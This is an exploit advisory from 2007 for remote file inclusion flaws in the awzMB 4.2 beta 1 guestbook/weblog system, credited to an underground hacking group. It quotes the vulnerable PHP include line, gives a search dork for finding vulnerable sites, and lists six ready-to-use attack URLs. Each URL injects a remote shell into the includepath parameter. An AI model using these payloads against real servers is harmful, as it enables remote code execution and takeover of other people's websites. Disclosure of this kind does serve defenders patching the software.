[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : awzMB <= 4.2 beta 1 Multiple Remote File Inclusion Vulnerabilities
# Published : 2007-10-18
# Author : S.W.A.T.
# Previous Title : ZZ FlashChat <= (help.php) 3.1 Local File Inclusion Vulnerability
# Next Title : PHPDJ 0.5 (djpage.php page) Remote File Inclusion Vulnerability
\|///
\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : awzMB system Version 4.2 beta 1 Guestbook/Weblog/Contact
Download : http://downloads.sourceforge.net/awzmb/awzmb_4.2_beta1.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
OurForum : http://svvat.3host.biz/forum/index.php
Dork : Copyright ???? 2001-2007 awzMB Project
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
( ) /
_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
if (!isset($Setting[OPT_includepath])) $Setting[OPT_includepath] = '';
include_once($Setting[OPT_includepath].'awzmb/modules/core/core.incl.php');
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/awzmb/adminhelp.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/help.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# www.Syue.com [2007-10-18]